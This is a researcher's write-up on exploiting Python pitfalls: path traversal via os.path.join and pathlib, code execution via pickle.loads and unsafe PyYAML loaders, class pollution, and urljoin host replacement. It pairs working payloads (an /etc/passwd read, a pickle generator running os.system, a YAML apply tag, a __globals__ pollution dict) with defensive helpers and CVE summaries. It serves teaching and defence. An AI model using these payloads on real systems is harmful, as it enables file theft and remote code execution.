Writeup by Alex Brumen aka Brumens, researcher enablement analyst, YesWeHack
In this article, you will discover and learn how to exploit common Python pitfalls that arise from subtle but dangerous behaviours in standard functions. These include path manipulation issues in os.path.join, URL handling quirks in urljoin, and class pollution problems in Python object handling.
I provide step-by-step guidance, supported by practical examples, on crafting payloads tailored to each function. These examples demonstrate how seemingly safe logic can be abused to achieve path traversal (CWE-22) and, in some cases, escalated into remote code execution (RCE).
Developers often assume that built-in functions automatically perform sanitisation or enforce safe behaviour. In reality, many of these functions contain edge-case behaviours that attackers can abuse to transform logic issues into exploitable vulnerabilities. For example, YAML deserialisation is commonly expected to simply parse structured data. However, when using PyYAML, the most widely adopted YAML library in Python, unsafe loaders can execute arbitrary Python code based on attacker-controlled input.
Whether you’re a pentester, security researcher or Bug Bounty hunter, this guide offers actionable advice on attacking commonly used functions in Python to exploit security vulnerabilities.
You can also explore these methods by watching my presentation of this research during the NahamCon 2025 Winter Edition and put them into practice by tackling my ‘Python Pitfalls’ training modules on Dojo.
How do Python security pitfalls arise in development
Python vulnerabilities often arise when developers use functions or libraries without reading the relevant documentation, instead making assumptions about a function’s behaviour based on its name or brief description.
Most functions include an explanation of their intended purpose in the official documentation or docstrings, often accompanied by warnings of when a known behaviour could be dangerous. However, many functions exhibit subtle or unexpected behaviours that are easy to miss. These details are frequently buried within the documentation or only become apparent when reading more deeply into the function’s exact behaviour.
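As an example, the function os.path.join has an unexpected behaviour: if any component is an absolute path (on POSIX systems, one that starts with a forward slash), all previous components are discarded and joining continues from the absolute component.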
Example code:
```python
import os

# Payload is an absolute path, starts with "/"
payload = "/etc/passwd"

file = os.path.join("/user/uploads/", payload)

with open(file, "r") as f:
    print(f.read())  # output the content of the file: "/etc/passwd"
```
Although this unexpected behaviour is mentioned inline within the documentation, it is easily overlooked. If you use this function together with unsanitised user input, you're vulnerable to path traversal. This can result in an attacker being able to perform file overwrites, read system files or achieve code injection.
Goal of this research
The research objective was to identify Python functions that are frequently found in production applications, and then to craft payloads that weaponise the aforementioned ‘Python pitfalls’.
As with most of my research, this project started with me trawling through documentation. This time, the focus was on Python’s os.path.join function, as mentioned earlier. I’ve known for years about how this function discards earlier path segments if a later component is an absolute path, and I’ve always been fascinated by unexpected behaviours that are intentionally built into functions. These edge cases are goldmines for hackers.
Finally, I’ve got round to digging deeper into Python as a programming language, and exploring how these design choices translate into practical pitfalls and how they can be abused in real-world attack scenarios.
MORE RESEARCH BY THIS AUTHOR The minefield between syntaxes: exploiting syntax confusions in the wild
Black-box testing for Python bugs
Black-box testing is a foundational skill for bug hunters and pentesters. It’s the art of understanding application behaviour by analysing how it responds to different inputs, without having access to the underlying source code.
Most real-world engagements involve attacking applications in a black-box environment. That’s why it’s essential to develop a strategy for fingerprinting the Python pitfalls we’re about to explore. Before doing so, you need to understand the core concepts of what to observe and extract from an application’s responses.
As an attacker, you should focus on the following key factors:
- Time delays
- Content
- Errors
- Reflected values
- Process result
- Verbose messages
- Syntax
When these behaviours appear only after sending a weaponised payload but change or disappear when a benign payload is used, it’s a strong indication that you’re triggering input-dependent code logic. This behaviour may directly expose a vulnerability or reveal a hidden pitfall in the application’s logic that warrants further testing.
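The comparison described above can be sketched as a small differential check. This is only an illustration: the `Observation` record, the `response_signals` helper and the two-second threshold are hypothetical names and values chosen for this example, not part of any tool mentioned in this article.

```python
from dataclasses import dataclass


@dataclass
class Observation:
    """What was recorded for one request (hypothetical structure)."""
    status: int      # HTTP status code
    body: str        # response body
    elapsed: float   # response time in seconds


def response_signals(benign, weaponised, time_threshold=2.0):
    """List the factors that differ between a benign and a weaponised request."""
    signals = []
    if benign.status != weaponised.status:
        signals.append("status")
    if len(benign.body) != len(weaponised.body):
        signals.append("content length")
    # Only flag a delay that clearly exceeds normal jitter (assumed threshold)
    if weaponised.elapsed - benign.elapsed > time_threshold:
        signals.append("time delay")
    return signals
```

An empty list suggests the payload did not reach input-dependent logic; any reported signal is a hint to investigate, not proof of a vulnerability.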
Detecting Python pitfall patterns
When identifying Python pitfalls, your focus should be on how user-controlled input is handled by specific functions or code patterns. Look for:
- The function’s behaviour changing depending on the supplied input
- The function performing normalisation that alters the original input
- The function parsing or interpreting input instead of treating it as raw data
These patterns frequently introduce subtle logic flaws that can be escalated into exploitable vulnerabilities.
Commonly exploitable Python functions
During the research, I discovered six different Python pitfalls. Five originate from built-in libraries, and one comes from a widely used external library.
The affected functions are:
- os.path.join (built-in)
- pathlib.joinpath (built-in)
- pickle.loads (built-in)
- urllib.parse.urljoin (built-in)
- PyYAML's load function (external library)
- Python3 class pollution (built-in)
os.path.join & path traversal
Python’s os.path.join function joins one or more path segments and returns a single, concatenated path.
The main pitfall lies in how this behaviour is commonly misunderstood. Many developers assume that os.path.join sanitises or normalises all path components as part of the joining process. Based on this assumption, they might apply flawed logic, believing that inputs such as dot-dot-slash (../) sequences or absolute paths embedded in the middle of the path will be safely normalised or rejected.
In reality, os.path.join does not prevent path traversal or enforce path containment, and will happily discard earlier path segments if an absolute path appears later in the input. The documentation does mention this behaviour, but only inline and without strong warnings, making it easy to overlook during development.
The following code snippet demonstrates this pitfall:
```python
import os

payload = "/etc/passwd"

file = os.path.join("/user/uploads/", payload)

with open(file, "r") as f:
    print(f.read())  # print the "/etc/passwd" file content
```
Here’s a useful visualisation of the code workflow for os.path.join:
Risks exposed
The primary vulnerability exposed by this pitfall is path traversal, which can lead to several high-impact issues, including:
- Arbitrary system file reads
- File overwrite
- Remote code execution (RCE)
These impacts depend on how the resulting path is used within the application and whether additional unsafe operations are performed on the resolved file path.
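On the defensive side, one common way to keep a joined path inside its base directory is to resolve the result and compare it with the base. The sketch below is a minimal example of that idea, not a complete defence; `safe_join` is a hypothetical helper name introduced here for illustration.

```python
import os


def safe_join(base_dir: str, user_path: str) -> str:
    """Join user_path onto base_dir and refuse results outside base_dir."""
    base = os.path.realpath(base_dir)
    # os.path.join may discard `base` entirely if user_path is absolute;
    # realpath then collapses "../" sequences and resolves symlinks.
    candidate = os.path.realpath(os.path.join(base, user_path))
    # The resolved path must still sit under the resolved base directory
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate
```

With this check in place, both "/etc/passwd" and "../../etc/passwd" are rejected with a ValueError, while a plain file name is returned as a path under the base directory.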
Real-world vulnerabilities: CVEs exploiting os.path.join pitfalls
Production applications continue to fall victim to developers’ ignorance of this os.path.join pitfall, as the following vulnerabilities demonstrate:
CVE-2025-57403 – path traversal to RCE
Unsanitised os.path.join input in Gerapy allowed arbitrary file writes, escalating to remote code execution through critical file overwrites.
CVE-2025-6278 – Absolute path truncation
Missing path validation in Upsonic allowed absolute paths (/etc/passwd) to truncate base directories, enabling arbitrary file reads.
PyPA issue #4946 – Path traversal leads to arbitrary file write
In Setuptools’ PackageIndex.download, path construction from archive contents without validation allowed malicious packages to extract files outside intended directories, affecting thousands of dependent projects.
Practical lab for os.path.join
Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.
pathlib.joinpath & path traversal
The pathlib.joinpath method is very similar to os.path.join. Calling it is equivalent to appending each provided path segment in sequence.
Just like os.path.join, you might expect joinpath to sanitise input or enforce safe normalisation. But that is not the case. If any segment is an absolute path, it discards the earlier parts and continues from the absolute path. It also accepts dot-dot-slash sequences, which means user-controlled input can still lead to path traversal if you rely on it for safety.
Example code:
```python
from pathlib import Path

payload = "/etc/passwd"

file = Path("/var/www/html").joinpath("files", payload)

with open(file, "r") as f:
    print(f.read())  # print the "/etc/passwd" file content
```
Here’s a useful visualisation of the code workflow for pathlib.joinpath:
Risks exposed
The similarities with os.path.join mean the pitfalls I found in pathlib.joinpath also lead to path traversal vulnerabilities, with the same impacts:
- Arbitrary system file reads
- File overwrite
- Remote code execution (RCE)
These impacts depend on how the resulting path is used within the application. If the output of pathlib.joinpath is passed directly to file operations such as read or write without additional validation, the application becomes vulnerable.
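As an illustration of the "additional validation" mentioned above, the following sketch resolves the joined path and checks that it is still located under the base directory. `resolve_inside` is a hypothetical helper name, and `Path.is_relative_to` requires Python 3.9 or later.

```python
from pathlib import Path


def resolve_inside(base_dir: Path, user_path: str) -> Path:
    """Join user_path onto base_dir and refuse results outside base_dir."""
    base = base_dir.resolve()
    # joinpath restarts from user_path if it is absolute;
    # resolve() then collapses ".." segments and follows symlinks.
    candidate = base.joinpath(user_path).resolve()
    if not candidate.is_relative_to(base):  # Python 3.9+
        raise ValueError(f"path escapes base directory: {user_path!r}")
    return candidate
```

The check runs on the resolved path rather than on the raw input, so it does not depend on spotting every possible traversal sequence in the user-supplied string.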
Practical lab for pathlib.joinpath
Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.
pickle.loads & RCE
Python’s pickle module is well known for being dangerous when used with user-controlled input, especially the function pickle.loads. While this behaviour can be considered a pitfall, using this function with untrusted input introduces a direct vulnerability known as deserialization of untrusted data (CWE-502), which can result in arbitrary code execution and full RCE.
Example code:
```python
import pickle, base64

payload = "gASVHQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg=="

# Execute code during unserialization (system command: "id")
file = pickle.loads(base64.b64decode(payload))
```
To generate a payload that triggers this Python code injection, we could use a script like this:
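```python
import os, base64, pickle


class RCE:
    def __reduce__(self):
        # pickle calls the returned callable with the returned arguments on load
        cmd = "id"
        return os.system, (cmd,)


pickled = pickle.dumps(RCE())
# Standard Base64, so the output matches a target that decodes with base64.b64decode
print("Payload:", base64.b64encode(pickled).decode("utf-8"))
```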
The code above creates a serialised object that, once deserialised, executes the system command id via the __reduce__ object method.
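To see why deserialisation ends in a function call, it can help to inspect the opcode stream without executing it. The sketch below uses the standard library's `pickletools.genops` on the Base64 payload shown earlier; the variable names are only illustrative.

```python
import base64
import pickletools

payload = base64.b64decode(
    "gASVHQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg=="
)

# genops walks the opcode stream without executing any of it
ops = [(opcode.name, arg) for opcode, arg, _pos in pickletools.genops(payload)]

opcode_names = [name for name, _ in ops]
strings = [arg for _, arg in ops if isinstance(arg, str)]

print(strings)  # the module, function and argument embedded in the payload
print("STACK_GLOBAL" in opcode_names, "REDUCE" in opcode_names)
```

STACK_GLOBAL looks up the callable named by the two strings before it (here `posix.system`), and REDUCE calls it with the argument tuple, which is how `id` ends up being executed during `pickle.loads`.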
Example workflow when using pickle.loads:
Risks exposed
The pickle.loads pitfall exposes a vulnerability that can result in code injection and, consequently, RCE.
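Where pickle cannot be avoided, the Python documentation describes restricting which globals an unpickler may load by overriding `Unpickler.find_class`. The following is a minimal sketch of that pattern which refuses every global lookup; `NoGlobalsUnpickler` and `restricted_loads` are names chosen for this example. For untrusted input, a data-only format such as JSON is generally the safer choice.

```python
import base64
import io
import pickle


class NoGlobalsUnpickler(pickle.Unpickler):
    """Unpickler that refuses every class or function lookup."""

    def find_class(self, module, name):
        # Called whenever the pickle stream asks for a global such as posix.system
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads, but only plain built-in data types can be rebuilt."""
    return NoGlobalsUnpickler(io.BytesIO(data)).load()


malicious = base64.b64decode(
    "gASVHQAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAJpZJSFlFKULg=="
)
try:
    restricted_loads(malicious)
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

Plain containers such as dictionaries, lists, strings and integers still round-trip, because they are rebuilt by dedicated opcodes and never go through `find_class`.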
Real-world vulnerabilities: CVEs exploiting pickle.loads
Developers seeking an easy way to deserialize data can inadvertently create vulnerabilities through their use of pickle.loads. This trio of CVEs demonstrates that the problem is a recent one:
CVE-2025-3108 – insecure deserialization to RCE in JsonPickleSerializer
JsonPickleSerializer prioritizes deserialization using pickle.loads(), which can execute arbitrary code when processing untrusted data.
CVE-2026-23946 – insecure deserialization to RCE in Helpdesk module
Remote code execution possible for an attacker authenticated with staff-level privileges.
CVE-2025-1716 – RCE via malicious pickle file bypassing static analysis in Picklescan
An unsafe deserialization vulnerability in Python’s pickle module allowed an attacker to bypass static analysis tools like Picklescan and execute arbitrary code during deserialization.
Practical lab for pickle.loads
Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.
PyYAML & insecure deserialisation
Moving beyond built-in modules, when developers handle YAML-based data they most often turn to PyYAML. This external library makes it easy to serialise and deserialise YAML data.
However, there is an important catch in the documentation. When deserialising YAML data, developers often rely on PyYAML’s load function. If a safe loader is not explicitly specified, the application may become vulnerable to insecure deserialisation (CWE-502), in a manner similar to pickle.loads.
Using an unsafe loader allows attacker-controlled YAML content to instantiate arbitrary Python objects, which can lead to code execution during deserialisation.
Example code:
```python
import yaml

user_data = "!!python/object/apply:print ['pwned']"

result = yaml.load(user_data, Loader=yaml.Loader)
```
In the code above, the user input !!python/object/apply:print ['pwned'] instructs PyYAML’s loader (yaml.Loader) to invoke a Python function during deserialisation. As a result, the application executes print('pwned').
Example workflow when using yaml.load:
Risks exposed
Using yaml.load() with an unsafe loader introduces a code-execution vulnerability, potentially leading to RCE, similar to the risks associated with pickle.loads.
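For comparison, PyYAML's `yaml.safe_load` only constructs plain YAML types and rejects Python-specific tags. The sketch below assumes PyYAML is installed; `parse_untrusted_yaml` is a hypothetical wrapper name used only for this example.

```python
import yaml  # PyYAML, a third-party package


def parse_untrusted_yaml(text: str):
    """Parse YAML using the safe loader, which rejects Python object tags."""
    try:
        return yaml.safe_load(text)
    except yaml.YAMLError as exc:
        # Tags such as !!python/object/apply raise a ConstructorError here
        raise ValueError("rejected YAML document") from exc


print(parse_untrusted_yaml("name: demo\nport: 8080"))

try:
    parse_untrusted_yaml("!!python/object/apply:print ['pwned']")
except ValueError as exc:
    print("blocked:", exc)
```

The same payload that executed code under yaml.Loader is refused here, because the safe loader has no constructor registered for the python/object/apply tag.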
Real-world vulnerabilities: CVEs exploiting yaml.load
YAML is commonly used for configuration files, which often contain user-controllable data. Developers who use yaml.load without restricting the loader may unintentionally enable dangerous object deserialisation. This pitfall has been exposed by multiple CVEs:
CVE-2025-50460 – insecure YAML deserialization leading to RCE in ms-swift
An RCE in version 3.3.0 caused by unsafe deserialization in tests/run.py using yaml.load() from the PyYAML library (versions = 5.3.1).
CVE-2026-24009 – PyYAML insecure deserialization leading to RCE in Docling Core
Vulnerability present in applications using PyYAML prior to version 5.4 and invoking docling_core.types.doc.DoclingDocument.load_from_yaml() with untrusted YAML data.
Practical lab for yaml.load
Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.
Python3 & class pollution
Python can be vulnerable to class pollution. Unlike the other pitfalls covered here, this is not tied to a specific function but instead relates to how Python handles variables in memory and how they can be unexpectedly overwritten if improperly managed. Class pollution typically arises in code that merges objects insecurely.
Example code:
```python
some_var = "change me!"


class Dummy:
    def __init__(self):
        pass


def merge(source, destination):
    for key, value in source.items():
        if hasattr(destination, "get"):
            if destination.get(key) and type(value) == dict:
                merge(value, destination.get(key))
            else:
                destination[key] = value
        elif hasattr(destination, key) and type(value) == dict:
            merge(value, getattr(destination, key))
        else:
            setattr(destination, key, value)


some_class = Dummy()

payload = {
    "__init__": {
        "__globals__": {
            "some_var": "polluted"
        }
    }
}

merge(payload, some_class)

print(some_var)  # Output: polluted
```
Example workflow for Python class pollution:
Risks exposed
Because this pitfall affects how objects and classes are merged or modified at runtime, Python class pollution primarily introduces risks related to unintended attribute or variable overwrites in memory, which can directly impact application logic.
The following CWEs may be exposed when an application is vulnerable to Python class pollution:
- CWE-454: external initialization of trusted variables or data stores
- CWE-269: improper privilege management
- CWE-94: improper control of generation of code (‘code injection’)
Class pollution impact heavily depends on what data can be affected within the application, meaning a variety of security vulnerabilities may be exposed as a result.
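One way to reduce this risk in a recursive merge is to refuse keys that reach into Python's special attributes. The sketch below is a minimal illustration under that assumption; `safe_merge` and `Profile` are hypothetical names. A deny-list on double-underscore keys is only a baseline, and an explicit allow-list of expected keys is usually the stronger control.

```python
def safe_merge(source: dict, destination: object) -> None:
    """Recursively merge `source` into `destination`, refusing dunder keys."""
    for key, value in source.items():
        # Keys such as __init__, __globals__ or __class__ are the pollution gadgets
        if not isinstance(key, str) or key.startswith("__"):
            raise ValueError(f"refusing special attribute: {key!r}")
        if isinstance(destination, dict):
            if isinstance(value, dict) and isinstance(destination.get(key), dict):
                safe_merge(value, destination[key])
            else:
                destination[key] = value
        elif isinstance(value, dict) and hasattr(destination, key):
            safe_merge(value, getattr(destination, key))
        else:
            setattr(destination, key, value)


class Profile:
    def __init__(self):
        self.name = "guest"
        self.settings = {"theme": "light"}


profile = Profile()
safe_merge({"name": "alice", "settings": {"theme": "dark"}}, profile)
```

Ordinary updates still work, while a payload that starts at `__init__` is rejected before the merge can walk towards `__globals__`.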
Real-world vulnerabilities: CVEs exploiting Python class pollution
Class pollution vulnerabilities are relatively rare, but when developers do fall victim to this pitfall it often leads to severe security issues, as the following CVE demonstrates:
CVE-2025-58367 – class pollution via Delta class constructor in DeepDiff
An available gadget allowed deepdiff.serialization.SAFE_TO_IMPORT to be modified to permit dangerous classes such as posix.system, enabling insecure Pickle deserialisation via the Delta class and potentially allowing arbitrary Python code execution.
Practical lab for pitfalls using Python class pollution
Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.
Python urllib.parse.urljoin
Python’s urllib.parse.urljoin function constructs a final URL by combining a base URL with a second URL, which may be relative or absolute.
The surprising part is that urljoin behaves much like os.path.join and pathlib.joinpath, which discard earlier path segments when an absolute path is encountered, but with a wider impact: when the second argument is an absolute URL, urllib.parse.urljoin discards the entire base URL, including its scheme and host, and uses the supplied URL instead. A scheme-relative value such as //evil.com/ has a similar effect: it keeps the base scheme but replaces the host.
Example code:
```python
from urllib.parse import urljoin

payload = "http://evil.com/"
print(urljoin("http://example.com/", payload))  # output: http://evil.com/
```
Example workflow when using Python’s urljoin:
Risks exposed
This behaviour is easy to overlook and can introduce serious security issues when user input is involved. Developers often assume that urljoin always appends paths safely, but this truncation logic can be abused to redirect requests, bypass allow-lists or trigger other unintended behaviours.
The following vulnerabilities may be introduced:
- CWE-918: server-side request forgery (SSRF)
- CWE-22: path traversal
- CWE-235: improper handling of extra parameters
- CWE-601: URL redirection to untrusted site (‘open redirect’)
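A simple guard against these outcomes is to compare the origin of the joined URL with the origin of the base URL before using it. The sketch below illustrates the idea; `join_same_origin` is a hypothetical helper name, and the check only reflects how urllib itself parses the URL, which may differ from how a given HTTP client or browser interprets it.

```python
from urllib.parse import urljoin, urlsplit


def join_same_origin(base_url: str, user_part: str) -> str:
    """Join user_part onto base_url and refuse results on another origin."""
    joined = urljoin(base_url, user_part)
    base, result = urlsplit(base_url), urlsplit(joined)
    # An absolute or scheme-relative user_part changes the scheme and/or host
    if (result.scheme, result.netloc) != (base.scheme, base.netloc):
        raise ValueError(f"URL leaves the base origin: {user_part!r}")
    return joined


print(join_same_origin("http://example.com/", "docs/page"))

for candidate in ("http://evil.com/", "//evil.com/x"):
    try:
        join_same_origin("http://example.com/", candidate)
    except ValueError as exc:
        print("blocked:", exc)
```

Relative paths are joined as expected, while both the absolute URL and the scheme-relative variant are rejected because the resulting host no longer matches the base.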
Real-world vulnerabilities: CVEs exploiting Python urljoin
Developers tend to use urljoin when building URLs for redirects or performing internal requests. Without proper sanitisation of user-controllable input, this can expose serious vulnerabilities. Here are some real-world examples:
CVE-2024-42353 – vulnerability in WebOb’s HTTP location header normalization process
When normalising the HTTP Location header, WebOb parsed the redirect URL using urlparse and joined it to the base URL. A URL beginning with // was treated by urlparse as a scheme-less URI, causing the following segment to be interpreted as a hostname, which urljoin then used to replace the original.
CVE-2025-68696 – SSRF in httparty
Issue posed a risk of leaking API keys, and could allow third parties to issue requests to internal servers.
Practical lab for urljoin
Want to put this knowledge into practice? I published a training module and lab for testing this pitfall on Dojo, our CTF platform. This is available to run directly in your browser.
Mitigation best practices for Python pitfalls: improve your code logic
A code pitfall is not a vulnerability by itself. The only reliable way to avoid falling into these traps is to read and adhere to the documentation for the functions you use, especially when they process user-controlled input. It’s essential to understand the function’s logic, internal workflow and how its behaviour changes based on the input it receives.
With this understanding, developers can use or implement appropriate sanitisation mechanisms to prevent these pitfalls from turning into real vulnerabilities.
Python pitfalls research roadmap
Python pitfalls, along with similar issues across other programming languages and frameworks, will always exist, and many have yet to be discovered. Problematic code logic and unexpected behaviours triggered by user-controlled input continue to arise, giving attackers the opportunity to achieve unintended and sometimes severe impact.
Less-documented or misunderstood behaviours in functions that process user input represent valuable targets for security researchers and bug bounty hunters, as they often expose novel and unconventional exploitation paths. As programming languages evolve and frameworks are updated, new variants of these pitfalls continue to emerge in modern applications – making continuous research and testing essential for staying ahead of the threat landscape.
References and further reading
- Python 3.14.3 documentation
- Watch Brumens present this research at Nahamcon 2025 Winter Edition
- Training modules with labs on ‘Exploiting Python Pitfalls’



